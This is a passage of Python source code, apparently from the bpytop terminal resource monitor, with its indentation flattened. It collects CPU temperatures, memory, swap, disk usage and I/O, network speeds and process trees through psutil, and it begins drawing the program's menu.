elif entry_int in core_dict:
continue
core_dict[entry_int] = round(entry.current)
continue
elif cpu_type in ["intel", "ryzen"]:
continue
if not cpu_type:
cpu_type = "other"
if not cls.cpu_temp_high or cls.sensor_swap:
cls.sensor_swap = False
if getattr(entry, "high", None) != None and entry.high > 1: cls.cpu_temp_high = round(entry.high)
else: cls.cpu_temp_high = 60 if name == "cpu_thermal" else 80
if getattr(entry, "critical", None) != None and entry.critical > 1: cls.cpu_temp_crit = round(entry.critical)
else: cls.cpu_temp_crit = 80 if name == "cpu_thermal" else 95
temp = round(entry.current)
cores.append(round(entry.current))
if core_dict:
if not temp or temp == 1000:
temp = sum(core_dict.values()) // len(core_dict)
if not cls.cpu_temp_high or not cls.cpu_temp_crit:
cls.cpu_temp_high, cls.cpu_temp_crit = 80, 95
cls.cpu_temp[0].append(temp)
if cpu_type == "ryzen":
ccds: int = len(core_dict)
cores_per_ccd: int = CORES // ccds
z: int = 1
for x in range(THREADS):
if x == CORES:
z = 1
if CORE_MAP[x] + 1 > cores_per_ccd * z:
z += 1
if z in core_dict:
cls.cpu_temp[x+1].append(core_dict[z])
else:
for x in range(THREADS):
if CORE_MAP[x] in core_dict:
cls.cpu_temp[x+1].append(core_dict[CORE_MAP[x]])
elif len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cls.cpu_temp[0].append(temp)
if len(cores) > 1:
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
try:
if cls.sensor_method == "coretemp":
temp = max(0, int(subprocess.check_output(["coretemp", "-p"], universal_newlines=True).strip()))
cores = [max(0, int(x)) for x in subprocess.check_output("coretemp", universal_newlines=True).split()]
if len(cores) == THREADS / 2:
cls.cpu_temp[0].append(temp)
for n, t in enumerate(cores, start=1):
try:
cls.cpu_temp[n].append(t)
cls.cpu_temp[THREADS // 2 + n].append(t)
except IndexError:
break
else:
cores.insert(0, temp)
for n, t in enumerate(cores):
try:
cls.cpu_temp[n].append(t)
except IndexError:
break
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "osx-cpu-temp":
temp = max(0, round(float(subprocess.check_output("osx-cpu-temp", universal_newlines=True).strip()[:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 85
cls.cpu_temp_crit = 100
elif cls.sensor_method == "vcgencmd":
temp = max(0, round(float(subprocess.check_output(["vcgencmd", "measure_temp"], universal_newlines=True).strip()[5:-2])))
if not cls.cpu_temp_high:
cls.cpu_temp_high = 60
cls.cpu_temp_crit = 80
except Exception as e:
errlog.exception(f'{e}')
cls.got_sensors = False
CpuBox._calc_size()
else:
if not cores:
cls.cpu_temp[0].append(temp)
if not core_dict and len(cores) <= 1:
cls.cpu_temp_only = True
if len(cls.cpu_temp[0]) > 5:
for n in range(len(cls.cpu_temp)):
if cls.cpu_temp[n]:
del cls.cpu_temp[n][0]
@classmethod
def _draw(cls):
CpuBox._draw_fg()
class MemCollector(Collector):
'''Collects memory and disks information'''
values: Dict[str, int] = {}
vlist: Dict[str, List[int]] = {}
percent: Dict[str, int] = {}
string: Dict[str, str] = {}
swap_values: Dict[str, int] = {}
swap_vlist: Dict[str, List[int]] = {}
swap_percent: Dict[str, int] = {}
swap_string: Dict[str, str] = {}
disks: Dict[str, Dict]
disk_hist: Dict[str, Tuple] = {}
timestamp: float = time()
disks_io_dict: Dict[str, Dict[str, List[int]]] = {}
recheck_diskutil: bool = True
diskutil_map: Dict[str, str] = {}
io_error: bool = False
old_disks: List[str] = []
old_io_disks: List[str] = []
fstab_filter: List[str] = []
excludes: List[str] = ["squashfs", "nullfs"]
if SYSTEM == "BSD": excludes += ["devfs", "tmpfs", "procfs", "linprocfs", "gvfs", "fusefs"]
buffer: str = MemBox.buffer
@classmethod
def _collect(cls):
#* Collect memory
mem = psutil.virtual_memory()
if hasattr(mem, "cached"):
cls.values["cached"] = mem.cached
else:
cls.values["cached"] = mem.active
cls.values["total"], cls.values["free"], cls.values["available"] = mem.total, mem.free, mem.available
cls.values["used"] = cls.values["total"] - cls.values["available"]
for key, value in cls.values.items():
cls.string[key] = floating_humanizer(value)
if key == "total": continue
cls.percent[key] = round(value * 100 / cls.values["total"])
if CONFIG.mem_graphs:
if not key in cls.vlist: cls.vlist[key] = []
cls.vlist[key].append(cls.percent[key])
if len(cls.vlist[key]) > MemBox.width: del cls.vlist[key][0]
#* Collect swap
if CONFIG.show_swap or CONFIG.swap_disk:
swap = psutil.swap_memory()
cls.swap_values["total"], cls.swap_values["free"] = swap.total, swap.free
cls.swap_values["used"] = cls.swap_values["total"] - cls.swap_values["free"]
if swap.total:
if not MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = True
for key, value in cls.swap_values.items():
cls.swap_string[key] = floating_humanizer(value)
if key == "total": continue
cls.swap_percent[key] = round(value * 100 / cls.swap_values["total"])
if CONFIG.mem_graphs:
if not key in cls.swap_vlist: cls.swap_vlist[key] = []
cls.swap_vlist[key].append(cls.swap_percent[key])
if len(cls.swap_vlist[key]) > MemBox.width: del cls.swap_vlist[key][0]
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
else:
if MemBox.swap_on:
MemBox.redraw = True
MemBox.swap_on = False
if not CONFIG.show_disks: return
#* Collect disks usage
disk_read: int = 0
disk_write: int = 0
dev_name: str
disk_name: str
filtering: Tuple = ()
filter_exclude: bool = False
io_string_r: str
io_string_w: str
u_percent: int
cls.disks = {}
if CONFIG.disks_filter:
if CONFIG.disks_filter.startswith("exclude="):
filter_exclude = True
filtering = tuple(v.strip() for v in CONFIG.disks_filter.replace("exclude=", "").strip().split(","))
else:
filtering = tuple(v.strip() for v in CONFIG.disks_filter.strip().split(","))
try:
io_counters = psutil.disk_io_counters(perdisk=SYSTEM != "BSD", nowrap=True)
except ValueError as e:
if not cls.io_error:
cls.io_error = True
errlog.error(f'Non fatal error during disk io collection!')
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
errlog.error(f'Caused by outdated psutil version.')
errlog.exception(f'{e}')
io_counters = None
if SYSTEM == "MacOS" and cls.recheck_diskutil:
cls.recheck_diskutil = False
try:
dutil_out = subprocess.check_output(["diskutil", "list", "physical"], universal_newlines=True)
for line in dutil_out.split("\n"):
line = line.replace("\u2068", "").replace("\u2069", "")
if line.startswith("/dev/"):
xdisk = line.split()[0].replace("/dev/", "")
elif "Container" in line:
ydisk = line.split()[3]
if xdisk and ydisk:
cls.diskutil_map[xdisk] = ydisk
xdisk = ydisk = ""
except:
pass
if CONFIG.use_fstab and SYSTEM != "MacOS" and not cls.fstab_filter:
try:
with open('/etc/fstab','r') as fstab:
for line in fstab:
line = line.strip()
if line and not line.startswith('#'):
mount_data = (line.split())
if mount_data[2].lower() != "swap":
cls.fstab_filter += [mount_data[1]]
errlog.debug(f'new fstab_filter set : {cls.fstab_filter}')
except IOError:
CONFIG.use_fstab = False
errlog.warning(f'Error reading fstab, use_fstab flag reset to {CONFIG.use_fstab}')
if not CONFIG.use_fstab and cls.fstab_filter:
cls.fstab_filter = []
errlog.debug(f'use_fstab flag has been turned to {CONFIG.use_fstab}, fstab_filter cleared')
for disk in psutil.disk_partitions(all=CONFIG.use_fstab or not CONFIG.only_physical):
disk_io = None
io_string_r = io_string_w = ""
if CONFIG.use_fstab and disk.mountpoint not in cls.fstab_filter:
continue
disk_name = disk.mountpoint.rsplit('/', 1)[-1] if not disk.mountpoint == "/" else "root"
if cls.excludes and disk.fstype in cls.excludes:
continue
if filtering and ((not filter_exclude and not disk.mountpoint in filtering) or (filter_exclude and disk.mountpoint in filtering)):
continue
if SYSTEM == "MacOS" and disk.mountpoint == "/private/var/vm":
continue
try:
disk_u = psutil.disk_usage(disk.mountpoint)
except:
pass
u_percent = round(getattr(disk_u, "percent", 0))
cls.disks[disk.device] = { "name" : disk_name, "used_percent" : u_percent, "free_percent" : 100 - u_percent }
for name in ["total", "used", "free"]:
cls.disks[disk.device][name] = floating_humanizer(getattr(disk_u, name, 0))
#* Collect disk io
if io_counters:
try:
if SYSTEM != "BSD":
dev_name = os.path.realpath(disk.device).rsplit('/', 1)[-1]
if not dev_name in io_counters:
for names in io_counters:
if names in dev_name:
disk_io = io_counters[names]
break
else:
if cls.diskutil_map:
for names, items in cls.diskutil_map.items():
if items in dev_name and names in io_counters:
disk_io = io_counters[names]
else:
disk_io = io_counters[dev_name]
elif disk.mountpoint == "/":
disk_io = io_counters
else:
raise Exception
disk_read = round((disk_io.read_bytes - cls.disk_hist[disk.device][0]) / (time() - cls.timestamp)) #type: ignore
disk_write = round((disk_io.write_bytes - cls.disk_hist[disk.device][1]) / (time() - cls.timestamp)) #type: ignore
if not disk.device in cls.disks_io_dict:
cls.disks_io_dict[disk.device] = {"read" : [], "write" : [], "rw" : []}
cls.disks_io_dict[disk.device]["read"].append(disk_read >> 20)
cls.disks_io_dict[disk.device]["write"].append(disk_write >> 20)
cls.disks_io_dict[disk.device]["rw"].append((disk_read + disk_write) >> 20)
if len(cls.disks_io_dict[disk.device]["read"]) > MemBox.width:
del cls.disks_io_dict[disk.device]["read"][0], cls.disks_io_dict[disk.device]["write"][0], cls.disks_io_dict[disk.device]["rw"][0]
except:
disk_read = disk_write = 0
else:
disk_read = disk_write = 0
if disk_io:
cls.disk_hist[disk.device] = (disk_io.read_bytes, disk_io.write_bytes)
if CONFIG.io_mode or MemBox.disks_width > 30:
if disk_read > 0:
io_string_r = f'▲{floating_humanizer(disk_read, short=True)}'
if disk_write > 0:
io_string_w = f'▼{floating_humanizer(disk_write, short=True)}'
if CONFIG.io_mode:
cls.disks[disk.device]["io_r"] = io_string_r
cls.disks[disk.device]["io_w"] = io_string_w
elif disk_read + disk_write > 0:
io_string_r += f'▼▲{floating_humanizer(disk_read + disk_write, short=True)}'
cls.disks[disk.device]["io"] = io_string_r + (" " if io_string_w and io_string_r else "") + io_string_w
if CONFIG.swap_disk and MemBox.swap_on:
cls.disks["__swap"] = { "name" : "swap", "used_percent" : cls.swap_percent["used"], "free_percent" : cls.swap_percent["free"], "io" : "" }
for name in ["total", "used", "free"]:
cls.disks["__swap"][name] = cls.swap_string[name]
if len(cls.disks) > 2:
try:
new = { list(cls.disks)[0] : cls.disks.pop(list(cls.disks)[0])}
new["__swap"] = cls.disks.pop("__swap")
new.update(cls.disks)
cls.disks = new
except:
pass
if cls.old_disks != list(cls.disks) or cls.old_io_disks != list(cls.disks_io_dict):
MemBox.redraw = True
cls.recheck_diskutil = True
cls.old_disks = list(cls.disks)
cls.old_io_disks = list(cls.disks_io_dict)
cls.timestamp = time()
@classmethod
def _draw(cls):
MemBox._draw_fg()
class NetCollector(Collector):
'''Collects network stats'''
buffer: str = NetBox.buffer
nics: List[str] = []
nic_i: int = 0
nic: str = ""
new_nic: str = ""
nic_error: bool = False
reset: bool = False
graph_raise: Dict[str, int] = {"download" : 5, "upload" : 5}
graph_lower: Dict[str, int] = {"download" : 5, "upload" : 5}
#min_top: int = 10<<10
#* Stats structure = stats[netword device][download, upload][total, last, top, graph_top, offset, speed, redraw, graph_raise, graph_low] = int, List[int], bool
stats: Dict[str, Dict[str, Dict[str, Any]]] = {}
#* Strings structure strings[network device][download, upload][total, byte_ps, bit_ps, top, graph_top] = str
strings: Dict[str, Dict[str, Dict[str, str]]] = {}
switched: bool = False
timestamp: float = time()
net_min: Dict[str, int] = {"download" : -1, "upload" : -1}
auto_min: bool = CONFIG.net_auto
net_iface: str = CONFIG.net_iface
sync_top: int = 0
sync_string: str = ""
address: str = ""
@classmethod
def _get_nics(cls):
'''Get a list of all network devices sorted by highest throughput'''
cls.nic_i = 0
cls.nics = []
cls.nic = ""
try:
io_all = psutil.net_io_counters(pernic=True)
except Exception as e:
if not cls.nic_error:
cls.nic_error = True
errlog.exception(f'{e}')
if not io_all: return
up_stat = psutil.net_if_stats()
for nic in sorted(io_all.keys(), key=lambda nic: (getattr(io_all[nic], "bytes_recv", 0) + getattr(io_all[nic], "bytes_sent", 0)), reverse=True):
if nic not in up_stat or not up_stat[nic].isup:
continue
cls.nics.append(nic)
if not cls.nics: cls.nics = [""]
cls.nic = cls.nics[cls.nic_i]
if cls.net_iface and cls.net_iface in cls.nics:
cls.nic = cls.net_iface
cls.nic_i = cls.nics.index(cls.nic)
@classmethod
def switch(cls, key: str):
if cls.net_iface: cls.net_iface = ""
if len(cls.nics) < 2 and cls.nic in cls.nics:
return
if cls.nic_i == -1:
cls.nic_i = 0 if key == "n" else -1
else:
cls.nic_i += +1 if key == "n" else -1
cls.nic_i %= len(cls.nics)
cls.new_nic = cls.nics[cls.nic_i]
cls.switched = True
Collector.collect(NetCollector, redraw=True)
@classmethod
def _collect(cls):
speed: int
stat: Dict
up_stat = psutil.net_if_stats()
if sorted(cls.nics) != sorted(nic for nic in up_stat if up_stat[nic].isup):
old_nic = cls.nic
cls._get_nics()
cls.nic = old_nic
if cls.nic not in cls.nics:
cls.nic_i = -1
else:
cls.nic_i = cls.nics.index(cls.nic)
if cls.switched:
cls.nic = cls.new_nic
cls.switched = False
if not cls.nic or cls.nic not in up_stat:
cls._get_nics()
if not cls.nic: return
try:
io_all = psutil.net_io_counters(pernic=True)[cls.nic]
except KeyError:
pass
return
if not cls.nic in cls.stats:
cls.stats[cls.nic] = {}
cls.strings[cls.nic] = { "download" : {}, "upload" : {}}
for direction, value in ["download", io_all.bytes_recv], ["upload", io_all.bytes_sent]:
cls.stats[cls.nic][direction] = { "total" : value, "last" : value, "top" : 0, "graph_top" : 0, "offset" : 0, "speed" : [], "redraw" : True, "graph_raise" : 0, "graph_lower" : 7 }
for v in ["total", "byte_ps", "bit_ps", "top", "graph_top"]:
cls.strings[cls.nic][direction][v] = ""
cls.stats[cls.nic]["download"]["total"] = io_all.bytes_recv
cls.stats[cls.nic]["upload"]["total"] = io_all.bytes_sent
if cls.nic in psutil.net_if_addrs():
cls.address = getattr(psutil.net_if_addrs()[cls.nic][0], "address", "")
for direction in ["download", "upload"]:
stat = cls.stats[cls.nic][direction]
strings = cls.strings[cls.nic][direction]
#* Calculate current speed
stat["speed"].append(round((stat["total"] - stat["last"]) / (time() - cls.timestamp)))
stat["last"] = stat["total"]
speed = stat["speed"][-1]
if cls.net_min[direction] == -1:
cls.net_min[direction] = units_to_bytes(getattr(CONFIG, "net_" + direction))
stat["graph_top"] = cls.net_min[direction]
stat["graph_lower"] = 7
if not cls.auto_min:
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
if stat["offset"] and stat["offset"] > stat["total"]:
cls.reset = True
if cls.reset:
if not stat["offset"]:
stat["offset"] = stat["total"]
else:
stat["offset"] = 0
if direction == "upload":
cls.reset = False
NetBox.redraw = True
if len(stat["speed"]) > NetBox.width * 2:
del stat["speed"][0]
strings["total"] = floating_humanizer(stat["total"] - stat["offset"])
strings["byte_ps"] = floating_humanizer(stat["speed"][-1], per_second=True)
strings["bit_ps"] = floating_humanizer(stat["speed"][-1], bit=True, per_second=True)
if speed > stat["top"] or not stat["top"]:
stat["top"] = speed
strings["top"] = floating_humanizer(stat["top"], bit=True, per_second=True)
if cls.auto_min:
if speed > stat["graph_top"]:
stat["graph_raise"] += 1
if stat["graph_lower"] > 0: stat["graph_lower"] -= 1
elif speed < stat["graph_top"] // 10:
stat["graph_lower"] += 1
if stat["graph_raise"] > 0: stat["graph_raise"] -= 1
if stat["graph_raise"] >= 5 or stat["graph_lower"] >= 5:
if stat["graph_raise"] >= 5:
stat["graph_top"] = round(max(stat["speed"][-5:]) / 0.8)
elif stat["graph_lower"] >= 5:
stat["graph_top"] = max(10 << 10, max(stat["speed"][-5:]) * 3)
stat["graph_raise"] = 0
stat["graph_lower"] = 0
stat["redraw"] = True
strings["graph_top"] = floating_humanizer(stat["graph_top"], short=True)
cls.timestamp = time()
if CONFIG.net_sync:
c_max: int = max(cls.stats[cls.nic]["download"]["graph_top"], cls.stats[cls.nic]["upload"]["graph_top"])
if c_max != cls.sync_top:
cls.sync_top = c_max
cls.sync_string = floating_humanizer(cls.sync_top, short=True)
NetBox.redraw = True
@classmethod
def _draw(cls):
NetBox._draw_fg()
class ProcCollector(Collector):
'''Collects process stats'''
buffer: str = ProcBox.buffer
search_filter: str = ""
case_sensitive: bool = False
processes: Dict = {}
num_procs: int = 0
det_cpu: float = 0.0
detailed: bool = False
detailed_pid: Union[int, None] = None
details: Dict[str, Any] = {}
details_cpu: List[int] = []
details_mem: List[int] = []
expand: int = 0
collapsed: Dict = {}
tree_counter: int = 0
p_values: List[str] = ["pid", "name", "cmdline", "num_threads", "username", "memory_percent", "cpu_percent", "cpu_times", "create_time"]
sort_expr: Dict = {}
sort_expr["pid"] = compile("p.info['pid']", "str", "eval")
sort_expr["program"] = compile("'' if p.info['name'] == 0.0 else p.info['name']", "str", "eval")
sort_expr["arguments"] = compile("' '.join(str(p.info['cmdline'])) or ('' if p.info['name'] == 0.0 else p.info['name'])", "str", "eval")
sort_expr["threads"] = compile("0 if p.info['num_threads'] == 0.0 else p.info['num_threads']", "str", "eval")
sort_expr["user"] = compile("'' if p.info['username'] == 0.0 else p.info['username']", "str", "eval")
sort_expr["memory"] = compile("p.info['memory_percent']", "str", "eval")
sort_expr["cpu lazy"] = compile("(sum(p.info['cpu_times'][:2] if not p.info['cpu_times'] == 0.0 else [0.0, 0.0]) * 1000 / (time() - p.info['create_time']))", "str", "eval")
sort_expr["cpu responsive"] = compile("(p.info['cpu_percent'] if CONFIG.proc_per_core else (p.info['cpu_percent'] / THREADS))", "str", "eval")
@classmethod
def _collect(cls):
'''List all processess with pid, name, arguments, threads, username, memory percent and cpu percent'''
if not "proc" in Box.boxes: return
out: Dict = {}
cls.det_cpu = 0.0
sorting: str = CONFIG.proc_sorting
reverse: bool = not CONFIG.proc_reversed
proc_per_cpu: bool = CONFIG.proc_per_core
search: List[str] = []
if cls.search_filter:
if cls.case_sensitive:
search = [i.strip() for i in cls.search_filter.split(",")]
else:
search = [i.strip() for i in cls.search_filter.lower().split(",")]
err: float = 0.0
n: int = 0
if CONFIG.proc_tree and sorting == "arguments":
sorting = "program"
sort_cmd = cls.sort_expr[sorting]
if CONFIG.proc_tree:
cls._tree(sort_cmd=sort_cmd, reverse=reverse, proc_per_cpu=proc_per_cpu, search=search)
else:
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt or cls.proc_interrupt:
return
if p.info["name"] == "idle" or p.info["name"] == err or p.info["pid"] == err:
continue
if p.info["cmdline"] == err:
p.info["cmdline"] = ""
if p.info["username"] == err:
p.info["username"] = ""
if p.info["num_threads"] == err:
p.info["num_threads"] = 0
if search:
if cls.detailed and p.info["pid"] == cls.detailed_pid:
cls.det_cpu = p.info["cpu_percent"]
for value in [ p.info["name"], " ".join(p.info["cmdline"]), str(p.info["pid"]), p.info["username"] ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
break
else: continue
break
else: continue
cpu = p.info["cpu_percent"] if proc_per_cpu else round(p.info["cpu_percent"] / THREADS, 2)
mem = p.info["memory_percent"]
if CONFIG.proc_mem_bytes and hasattr(p.info["memory_info"], "rss"):
mem_b = p.info["memory_info"].rss
else:
mem_b = 0
cmd = " ".join(p.info["cmdline"]) or "[" + p.info["name"] + "]"
out[p.info["pid"]] = {
"name" : p.info["name"],
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : p.info["num_threads"],
"username" : p.info["username"],
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu }
n += 1
cls.num_procs = n
cls.processes = out.copy()
if cls.detailed:
cls.expand = ((ProcBox.width - 2) - ((ProcBox.width - 2) // 3) - 40) // 10
if cls.expand > 5: cls.expand = 5
if cls.detailed and not cls.details.get("killed", False):
try:
c_pid = cls.detailed_pid
det = psutil.Process(c_pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
cls.details["killed"] = True
cls.details["status"] = psutil.STATUS_DEAD
ProcBox.redraw = True
else:
attrs: List[str] = ["status", "memory_info", "create_time"]
if not SYSTEM == "MacOS": attrs.extend(["cpu_num"])
if cls.expand:
attrs.extend(["nice", "terminal"])
if not SYSTEM == "MacOS": attrs.extend(["io_counters"])
if not c_pid in cls.processes: attrs.extend(["pid", "name", "cmdline", "num_threads", "username", "memory_percent"])
cls.details = det.as_dict(attrs=attrs, ad_value="")
if det.parent() != None: cls.details["parent_name"] = det.parent().name()
else: cls.details["parent_name"] = ""
cls.details["pid"] = c_pid
if c_pid in cls.processes:
cls.details["name"] = cls.processes[c_pid]["name"]
cls.details["cmdline"] = cls.processes[c_pid]["cmd"]
cls.details["threads"] = f'{cls.processes[c_pid]["threads"]}'
cls.details["username"] = cls.processes[c_pid]["username"]
cls.details["memory_percent"] = cls.processes[c_pid]["mem"]
cls.details["cpu_percent"] = round(cls.processes[c_pid]["cpu"] * (1 if CONFIG.proc_per_core else THREADS))
else:
cls.details["cmdline"] = " ".join(cls.details["cmdline"]) or "[" + cls.details["name"] + "]"
cls.details["threads"] = f'{cls.details["num_threads"]}'
cls.details["cpu_percent"] = round(cls.det_cpu)
cls.details["killed"] = False
if SYSTEM == "MacOS":
cls.details["cpu_num"] = -1
cls.details["io_counters"] = ""
if hasattr(cls.details["memory_info"], "rss"): cls.details["memory_bytes"] = floating_humanizer(cls.details["memory_info"].rss) # type: ignore
else: cls.details["memory_bytes"] = "? Bytes"
if isinstance(cls.details["create_time"], float):
uptime = timedelta(seconds=round(time()-cls.details["create_time"],0))
if uptime.days > 0: cls.details["uptime"] = f'{uptime.days}d {str(uptime).split(",")[1][:-3].strip()}'
else: cls.details["uptime"] = f'{uptime}'
else: cls.details["uptime"] = "??:??:??"
if cls.expand:
if cls.expand > 1 : cls.details["nice"] = f'{cls.details["nice"]}'
if SYSTEM == "BSD":
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_count"): cls.details["io_read"] = f'{cls.details["io_counters"].read_count}'
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_count"): cls.details["io_write"] = f'{cls.details["io_counters"].write_count}'
else: cls.details["io_write"] = "?"
else:
if cls.expand > 2:
if hasattr(cls.details["io_counters"], "read_bytes"): cls.details["io_read"] = floating_humanizer(cls.details["io_counters"].read_bytes)
else: cls.details["io_read"] = "?"
if cls.expand > 3:
if hasattr(cls.details["io_counters"], "write_bytes"): cls.details["io_write"] = floating_humanizer(cls.details["io_counters"].write_bytes)
else: cls.details["io_write"] = "?"
if cls.expand > 4 : cls.details["terminal"] = f'{cls.details["terminal"]}'.replace("/dev/", "")
cls.details_cpu.append(cls.details["cpu_percent"])
mem = cls.details["memory_percent"]
if mem > 80: mem = round(mem)
elif mem > 60: mem = round(mem * 1.2)
elif mem > 30: mem = round(mem * 1.5)
elif mem > 10: mem = round(mem * 2)
elif mem > 5: mem = round(mem * 10)
else: mem = round(mem * 20)
cls.details_mem.append(mem)
if len(cls.details_cpu) > ProcBox.width: del cls.details_cpu[0]
if len(cls.details_mem) > ProcBox.width: del cls.details_mem[0]
@classmethod
def _tree(cls, sort_cmd, reverse: bool, proc_per_cpu: bool, search: List[str]):
'''List all processess in a tree view with pid, name, threads, username, memory percent and cpu percent'''
out: Dict = {}
err: float = 0.0
det_cpu: float = 0.0
infolist: Dict = {}
cls.tree_counter += 1
tree = defaultdict(list)
n: int = 0
for p in sorted(psutil.process_iter(cls.p_values + (["memory_info"] if CONFIG.proc_mem_bytes else []), err), key=lambda p: eval(sort_cmd), reverse=reverse):
if cls.collect_interrupt: return
try:
tree[p.ppid()].append(p.pid)
except (psutil.NoSuchProcess, psutil.ZombieProcess):
pass
else:
infolist[p.pid] = p.info
n += 1
if 0 in tree and 0 in tree[0]:
tree[0].remove(0)
def create_tree(pid: int, tree: defaultdict, indent: str = "", inindent: str = " ", found: bool = False, depth: int = 0, collapse_to: Union[None, int] = None):
nonlocal infolist, proc_per_cpu, search, out, det_cpu
name: str; threads: int; username: str; mem: float; cpu: float; collapse: bool = False
cont: bool = True
getinfo: Dict = {}
if cls.collect_interrupt: return
try:
name = psutil.Process(pid).name()
if name == "idle": return
except psutil.Error:
pass
cont = False
name = ""
if pid in infolist:
getinfo = infolist[pid]
if search and not found:
if cls.detailed and pid == cls.detailed_pid:
det_cpu = getinfo["cpu_percent"]
if "username" in getinfo and isinstance(getinfo["username"], float): getinfo["username"] = ""
if "cmdline" in getinfo and isinstance(getinfo["cmdline"], float): getinfo["cmdline"] = ""
for value in [ name, str(pid), getinfo.get("username", ""), " ".join(getinfo.get("cmdline", "")) ]:
if not cls.case_sensitive:
value = value.lower()
for s in search:
if s in value:
found = True
break
else: continue
break
else: cont = False
if cont:
if getinfo:
if getinfo["num_threads"] == err: threads = 0
else: threads = getinfo["num_threads"]
if getinfo["username"] == err: username = ""
else: username = getinfo["username"]
cpu = getinfo["cpu_percent"] if proc_per_cpu else round(getinfo["cpu_percent"] / THREADS, 2)
mem = getinfo["memory_percent"]
if getinfo["cmdline"] == err: cmd = ""
else: cmd = " ".join(getinfo["cmdline"]) or "[" + getinfo["name"] + "]"
if CONFIG.proc_mem_bytes and hasattr(getinfo["memory_info"], "rss"):
mem_b = getinfo["memory_info"].rss
else:
mem_b = 0
else:
threads = mem_b = 0
username = ""
mem = cpu = 0.0
if pid in cls.collapsed:
collapse = cls.collapsed[pid]
else:
collapse = depth > CONFIG.tree_depth
cls.collapsed[pid] = collapse
if collapse_to and not search:
out[collapse_to]["threads"] += threads
out[collapse_to]["mem"] += mem
out[collapse_to]["mem_b"] += mem_b
out[collapse_to]["cpu"] += cpu
else:
if pid in tree and len(tree[pid]) > 0:
sign: str = "+" if collapse else "-"
inindent = inindent.replace(" ├─ ", "[" + sign + "]─").replace(" └─ ", "[" + sign + "]─")
out[pid] = {
"indent" : inindent,
"name": name,
"cmd" : cmd.replace("\n", "").replace("\t", "").replace("\\", ""),
"threads" : threads,
"username" : username,
"mem" : mem,
"mem_b" : mem_b,
"cpu" : cpu,
"depth" : depth,
}
if search: collapse = False
elif collapse and not collapse_to:
collapse_to = pid
if pid not in tree:
return
children = tree[pid][:-1]
for child in children:
create_tree(child, tree, indent + " │ ", indent + " ├─ ", found=found, depth=depth+1, collapse_to=collapse_to)
create_tree(tree[pid][-1], tree, indent + " ", indent + " └─ ", depth=depth+1, collapse_to=collapse_to)
create_tree(min(tree), tree)
cls.det_cpu = det_cpu
if cls.collect_interrupt: return
if cls.tree_counter >= 100:
cls.tree_counter = 0
for pid in list(cls.collapsed):
if not psutil.pid_exists(pid):
del cls.collapsed[pid]
cls.num_procs = len(out)
cls.processes = out.copy()
@classmethod
def sorting(cls, key: str):
index: int = CONFIG.sorting_options.index(CONFIG.proc_sorting) + (1 if key in ["right", "l"] else -1)
if index >= len(CONFIG.sorting_options): index = 0
elif index < 0: index = len(CONFIG.sorting_options) - 1
CONFIG.proc_sorting = CONFIG.sorting_options[index]
if "left" in Key.mouse: del Key.mouse["left"]
Collector.collect(ProcCollector, interrupt=True, redraw=True)
@classmethod
def _draw(cls):
ProcBox._draw_fg()
class Menu:
'''Holds all menus'''
active: bool = False
close: bool = False
resized: bool = True
menus: Dict[str, Dict[str, str]] = {}
menu_length: Dict[str, int] = {}
background: str = ""
for name, menu in MENUS.items():
menu_length[name] = len(menu["normal"][0])
menus[name] = {}
for sel in ["normal", "selected"]:
menus[name][sel] = ""
for i in range(len(menu[sel])):
menus[name][sel] += Fx.trans(f'{Color.fg(MENU_COLORS[sel][i])}{menu[sel][i]}')
if i < len(menu[sel]) - 1: menus[name][sel] += f'{Mv.d(1)}{Mv.l(len(menu[sel][i]))}'
@classmethod
def main(cls):
if Term.width < 80 or Term.height < 24:
errlog.warning(f'The menu system only works on a terminal size of 80x24 or above!')
return
out: str = ""
banner: str = ""
redraw: bool = True
key: str = ""
mx: int = 0
my: int = 0
skip: bool = False
mouse_over: bool = False
mouse_items: Dict[str, Dict[str, int]] = {}
cls.active = True
cls.resized = True
menu_names: List[str] = list(cls.menus.keys())
menu_index: int = 0
menu_current: str = menu_names[0]
cls.background = f'{THEME.inactive_fg}' + Fx.uncolor(f'{Draw.saved_buffer()}') + f'{Term.fg}'
while not cls.close:
key = ""
if cls.resized:
banner = (f'{Banner.draw(Term.height // 2 - 10, center=True)}{Mv.d(1)}{Mv.l(46)}{Colors.black_bg}{Colors.default}{Fx.b}← esc'
f'{Mv.r(30)}{Fx.i}Version: {VERSION}{Fx.ui}{Fx.ub}{Term.bg}{Term.fg}')
if UpdateChecker.version != VERSION:
banner += f'{Mv.to(Term.height, 1)}{Fx.b}{THEME.title}New release {UpdateChecker.version} available at https://github.com/aristocratos/bpytop{Fx.ub}{Term.fg}'
cy = 0
for name, menu in cls.menus.items():
ypos = Term.height // 2 - 2 + cy
xpos = Term.width // 2 - (cls.menu_length[name] // 2)
mouse_items[name] = { "x1" : xpos, "x2" : xpos + cls.menu_length[name] - 1, "y1" : ypos, "y2" : ypos + 2 }
cy += 3
redraw = True
cls.resized = False
if redraw:
out = ""
for name, menu in cls.menus.items():
out += f'{Mv.to(mouse_items[name]["y1"], mouse_items[name]["x1"])}{menu["selected" if name == menu_current else "normal"]}'
if skip and redraw:
Draw.now(out)
elif not skip:
Draw.now(f'{cls.background}{banner}{out}')
skip = redraw = False
if Key.input_wait(Timer.left(), mouse=True):
if Key.mouse_moved():
